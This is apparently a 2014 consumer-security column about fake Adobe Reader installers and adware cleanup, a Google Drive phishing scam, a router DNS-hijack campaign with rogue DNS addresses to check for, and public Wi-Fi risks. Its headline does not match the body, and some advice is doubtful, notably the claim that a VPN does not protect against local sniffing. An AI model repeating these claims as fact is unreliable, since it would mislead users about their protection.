Thursday 16 October 2014

Anonymous networking

Anonymous networking

Davey Winder wonders if a social network can ever be truly anonymous, and is horrified by Facebook’s latest announcement.

Love it or loathe it, the Portable Document Format (PDF) – developed by Adobe and released to the world in 1993 – is a fact of online life. If you do any kind of internet research, you’re sure to find documents in this format, and while most web browsers have builtin PDF viewers, they’re typically less well featured than the real Adobe Reader. Regulars to these pages will know that I’ve been bashing Adobe for the past few years due to various security vulnerabilities in its products, not to mention the seemingly endless torrent of fix patches, but for once I’m putting these security matters aside to concentrate on an altogether different complaint.


Buy any new PC these days and it will almost certainly come stuffed with crapware (sorry, there’s really no more pleasant word). You know the kind of stuff – unwanted commercial software trials supposedly bundled to add value to your purchase, but in fact included purely to boost the vendor’s profits through partnership deals.

The first thing I do when I’m configuring a new computer is to uninstall as much crapware as possible, and replace it with software I actually want. Most people I know do the same, including technology guru Dick Pountain. He told me recently he’d just bought a new laptop that came with a fairly horrible commercial PDF reader preinstalled, so he went to Google to grab a link to the kosher Adobe Reader download site.

I wasn’t too surprised when he told me the first two links returned were both “fakes”, by which he meant that although the Adobe Reader XI software was genuine, it came wrapped inside a modified installer that wanted to shovel all sorts of potentially dangerous – and most definitely unwanted – software onto his laptop alongside it.

The URLs included the word “adobe” in order to appear legit and thus entice the unwary into downloading instead of going to the official Adobe site (which lay third in that particular listing). Other links claiming to be Adobe Reader will be adverts, sponsored links or – worse still – malwareridden scams there and in disguise.

Over the years, I’ve evolved to a point of sponsoredsearch blindness where I simply don’t see such links any more; I always head straight for the organic results. However, as Dick pointed out, not everyone is as cynical as we are. Others may believe that Google’s unofficial corporate motto of “Don’t be evil” is reflected in the real world, and that all adverts returned in search lists are actually genuine, helpful and harmless.

If you don’t mind your computer being clogged up with unwanted software, particularly of the browser toolbar and adware variety, go ahead and ignore my advice. For everyone else, here it is: don’t be fooled by the Google AdWords manipulators, and never click on an advert at the top of the results list. Organic search results are easy enough to distinguish if you take the time to look a little closer at the URLs, so always go direct.

This advice applies to a multitude of highrisk online scenarios: an email from your bank asking you to log in via a helpful link, a Facebook post that includes a link to a vendor’s special offer, and search results for software.

If you want Adobe Reader, get it direct from Adobe – go to www.adobe.com/au, scroll to the bottom and look in the footer for the download link. Alternatively, jump straight to http://get.adobe.com/reader for a direct download instead.

This advice also applies to any wellknown brand of software: bypass Google search and the dodgy download sites and head straight for the obvious home domain, from where you’ll be able to progressively navigate to a download section to ensure that you install the real thing.

The problem is – and to confuse matters still further – the official Adobe Reader download plays the same game. As you can see from the screenshot below, when you go to Adobe’s site and try to download Adobe Reader, it tries to force a “free” copy of McAfee Security Scan Plus on you. I use the terms “tries” and “force” deliberately here, because the checkbox for adding this product to your download package is automatically ticked – you have to opt out, rather than opt in, which is never welcome. I’m not saying the McAfee product is rubbish, since I haven’t tried it. But when I download a PDF reader, I want something to read PDFs, not something to perform a security scan; I already have one of those...

But what if you’ve already fallen for a fake Adobe Reader – or fake anything – software scam? Hopefully you’ll have been protected from any malware installations by the security software you’re running (and you are running something, aren’t you?). Perhaps you have double-whammy protection, such as my default setup these days: Eset Smart Security and Malwarebytes Anti-Malware Premium, which seem to run in perfect harmony and provide a good level of broad threat protection. But even with this added safety net, there’s still a chance that when you signed the end-user licence agreement (EULA) you agreed to install lots of unwanted apps.

Search toolbars and assorted adware – some of which may evade your security measures, depending on how you have them configured – are common examples. I have a templated response for anyone who contacts me about an “accidental install”, as they’re prone to calling them, which has caused their security software to go haywire and throw up warning after warning about blocked installations and quarantined files. (Of course, such warnings are a good thing, since they mean your defences are doing what they should, but they don’t guarantee that you haven’t been infected by something.) This is the type of scenario where my cleanup template comes into play:

• Create a new restore point.
• Download AdwCleaner (www.bleepingcomputer.com/download/adwcleaner/) and run a scan.
• Use AdwCleaner’s “clean” function to remove anything it finds.
• Download Junkware Removal Tool (www.bleepingcomputer.com/download/junkware-removaltool/).
• After disconnecting physically from the internet by switching off your router, close your security software (to prevent any conflict) and then run a scan.
• Once complete, with any toolbars or search bars removed, restart your security software and reconnect your router.
• Then, download RogueKiller (www.bleepingcomputer.com/download/roguekiller/).
• Remove any external drives (including any USB ones) and start the scan.
• Once the RogueKiller scan has finished, click “delete” and allow it to kill any rogue processes.
• Finally, delete all of the above tools from your computer. You should now hopefully be free of adware, crapware and malware.

I’d also encourage less tech-savvy family members and colleagues of PC & Tech Authority readers to install the freeware FileHippo.com Update Checker (www.filehippo.com/updatechecker). This scans for installed software and gets updates when available without pop-ups or the danger of spyware.

PHOOLING THE PHISHERMEN

There’s been much coverage online of what’s being described as a “dangerously convincing” and “clever and tricky-to-spot” phishing scam involving Google Drive. One tech journalist even said it was “almost impossible” to know it was a fake.

I can only assume that it’s the use of a google.com URL and Google SSL encryption that is leading people to describe it in these terms. After all, it starts with an unsolicited email with the subject “Important Google Document” and comes complete with a Google Drive link. I admit that there’s always a danger you might get such an email from a friend, work colleague or member of your social networking circle whose account has been hacked, which would add conviction through the old leverage-of-trust issue. Even then, it’s still not convincing enough. The message itself says simply: “Please view this document I have uploaded using Google Docs” and goes on to stress that “it is very important” without even trying to explain why.

In the event that you were foolhardy enough to fall for this notat-all-convincing spiel, that’s when things became interesting (I use the past tense because Google removed the fake pages sharpish). The fake login page was actually hosted on Google’s servers by using a public folder inside a Google Drive account, to make it appear more genuine, with Drive’s preview function enabling the use of a publicly accessible URL for the link. Once you logged in via this fake page, your credentials were scraped off to a compromised server while you viewed the pointless document.

Beyond the obvious advice – don’t click links or open attachments from anyone who sends you an unexpected email that says “view this document” – there are two simple tips that can save you from such login scrapers.

First, always deliberately get your login details wrong at the first attempt: have a fake username/email and stupid password ready for every initial login. If the site you’re looking at is genuine, it will spit back the credentials and ask you to try again, but most fakes will accept the first thing you enter without question, at which point red flags should be raised and the words “run away” should be ringing in your ears. You might also like to refer to my “emergency response template” above, just in case of drive-by downloads.

More observant readers will have spotted that I qualified this by saying “most fakes”. Here’s the thing: some login scrapers are clever enough to automatically refuse your first attempt to sidestep such a defence, or – in the case of some man-in-the-middle attacks – buy time by retrying the logins and performing their nefarious activity while you’re attempting to log in over and again. However, I’d say that we’re talking about at least 95% of all fake login sites here, so the ruse is still a very good first line of defence to adopt.

What you then need is a strong second line to shore this up, and this is where I get back on my twofactor soapbox again, I’m afraid. The use of two-factor authentication (2FA) or verification is growing, and is available on many sites now, including Google. If you‹ had two-factor authentication up and running, then even if you’d fallen for the Google Drive scam and given up your login and password, these would have been worthless to the phishermen. They ‹wouldn’t have been able to access or compromise your account from an unverified device without the passcode that would be texted to your smartphone
or generated by your authentication code app.

Sure, it can be a faff, especially when you ‹first set it up and have to go through the rigmarole of verifying your devices, but once that’s done it really isn’t a huge inconvenience for the superior protection it confers.

In fact, I’d go so far as to say that someone with a poor password and 2FA is better protected than someone with a complex password but no 2FA.

DANGEROUS ROUTE

Routers, while essential, are pretty dull, so when they’re promoted from the review pages to news headlines in the tech press, you know that something bad is happening.

The breaking bad here is an ongoing story about backdoors and vulnerabilities in router firmware. The latest twist in the tale is that more than 300,000 wireless routers around the world have fallen under the control of a‹cybercriminal gang, or gangs, who exploit DNS redirection to point unknowing small-business and home-router users at sites that install drive-by-download malware, or change the adverts being displayed for the referral money. Routers from D-Link, Micronet and TP-Link are among the models being hit, and research suggests that as many as 80% of installed routers in this sector could have critical security vulnerabilities.

This should come as no surprise to anyone who’s had the misfortune to delve into the dark‹art of router firmware updates. It’s a smelly can of worms, so most folk don’t bother updating. But they should. Indeed, as‹far as the‹average user is concerned, “if it‹ain’t broke…” applies, but these routers are badly, badly broken and need‹to be fixed.

Educating people that their router needs to‹be kept patched and up to date as much as their computer or smartphone is proving to be difficult, so I fear that this is an exploit vector that will only grow and grow, especially as the type of DNS redirection that’s come to light is‹particularly profitable when exploited on a‹highly organised scale.

Your mum may have her PC secured fairly well these days, but you can bet that her router hasn’t been touched since it came out of the box – it will almost certainly still have its default admin login settings intact. I’m advising anyone who will listen to log on to‹their router via the‹admin interface (a‹quick Google will reveal how to do this if‹you’re not sure, including bringing up the default admin password for your particular model) and check that its DNS settings are as they should be for your ISP – your ISP’s tech support will be able to provide this information if you don’t have it to hand. They certainly shouldn’t be 5.45.75.11 or 5.45.76.36, which are being used in the current redirection attack.

While you have your router at your mercy, change your admin login and password. Finally, look for the update settings and check to see if any new firmware update is available.

Many people have been repeating the obvious advice that doing your online banking or checking your email using free public Wi-Fi in a coffee shop or an airport lounge isn’t safe. This is hardly a myth, and it’s easy for someone to eavesdrop on your session using‹readily available packet-sniffing tools. I’ve used various freely available tools for my laptop and Android tablet that let me sniff out login data – for research purposes only, I hasten to add – and they work remarkably well.

Encrypted sessions are a different matter and‹ can’t be easily circumvented, so it is possible to use public Wi-Fi securely. However, the idea of having a fully encrypted online session is a non-starter. Even using a VPN‹won’t circumvent the problem of anyone who has the Wi-Fi network password being able to packet-sniff unless WPA2 802.1X enterprise code is being employed, and this ain’t ‹gonna happen in your local coffee shop.

The best advice, then, as far as using free public Wi-Fi goes, is just don’t bother.